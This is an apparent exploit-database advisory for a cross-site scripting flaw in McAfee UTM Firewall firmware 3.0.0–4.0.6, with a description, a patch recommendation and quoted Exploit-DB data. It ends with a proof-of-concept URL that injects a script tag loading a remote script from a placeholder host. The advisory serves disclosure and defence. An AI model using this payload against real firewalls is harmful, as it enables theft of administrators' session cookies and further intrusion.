Cross-Site Scripting Vulnerability in McAfee UTM Firewall

vendor:

Unified Threat Management Firewall

by:

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Unified Threat Management Firewall

Affected Version From: 3.0.0

Affected Version To: 4.0.6

Patch Exists: YES

Related CWE:

CPE: a:mcafee:unified_threat_management_firewall

Metasploit:

Other Scripts:

Platforms Tested:

Cross-Site Scripting Vulnerability in McAfee UTM Firewall

The web interface of McAfee UTM Firewall fails to properly sanitize user-supplied input, leading to a cross-site scripting vulnerability. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of a victim user, potentially stealing authentication credentials and launching further attacks.

Mitigation:

Update to a version of UTM Firewall firmware that has addressed this issue.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40708/info

McAfee Unified Threat Management (UTM) Firewall (formerly SnapGear) is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

UTM Firewall firmware versions 3.0.0 through 4.0.6 are vulnerable. 

http://example.net/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>